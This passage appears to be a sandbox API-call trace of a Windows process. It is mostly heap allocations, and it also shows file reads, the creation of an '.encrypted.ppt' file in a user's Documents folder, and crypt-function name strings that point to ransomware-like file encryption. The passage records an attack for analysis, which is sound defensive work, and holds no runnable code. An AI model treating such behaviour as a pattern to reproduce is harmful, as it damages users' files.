[0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0035.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c9798 [0035.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0035.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0035.464] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0035.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9798 | out: hHeap=0x770000) returned 1 [0035.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0035.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0035.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.464] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0035.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0035.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0035.465] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x")) returned 0x10 [0035.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0035.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0035.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0035.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.465] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.465] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0035.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.466] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\146Rtg30PAl-LzIM9L_.encrypted.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\146rtg30pal-lzim9l_.encrypted.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0035.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0035.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0035.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0035.466] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.466] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0035.466] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0035.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0035.467] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0035.467] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0035.467] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0035.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0035.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.467] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.467] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0035.468] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0035.468] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0035.470] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x6e8, lpOverlapped=0x0) returned 1 [0035.470] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0035.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.470] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.470] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x106e8) returned 0x955018 [0035.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0035.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0035.471] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0035.471] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x106e8) returned 0x965708 [0035.472] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.474] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.474] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0035.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.474] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x106e8) returned 0x955018 [0035.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0035.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.475] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.475] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.475] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0035.476] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.476] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0035.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x106e8) returned 0x955018 [0035.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0035.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da288 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0035.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.476] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0035.476] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0035.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca18 [0035.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0035.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0035.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0035.477] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x106e8) returned 0x975df8 [0035.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0035.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0035.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0035.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0035.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0035.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0035.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0035.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0035.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0035.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0035.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0035.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0035.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0035.479] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0035.479] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.479] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0035.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0035.480] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0035.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0035.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.480] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0035.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da158 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0035.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccd0 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0035.480] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.480] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0035.480] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0035.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0035.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0035.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0035.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0035.481] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0035.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0035.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0035.481] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0035.482] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0035.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0035.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0035.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0035.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0035.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0035.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0035.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0035.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0035.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0035.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0035.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0035.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0035.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0035.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0035.482] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.482] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0035.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0035.482] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.482] RtlAllocateHeap (HeapHandle=0x770000, 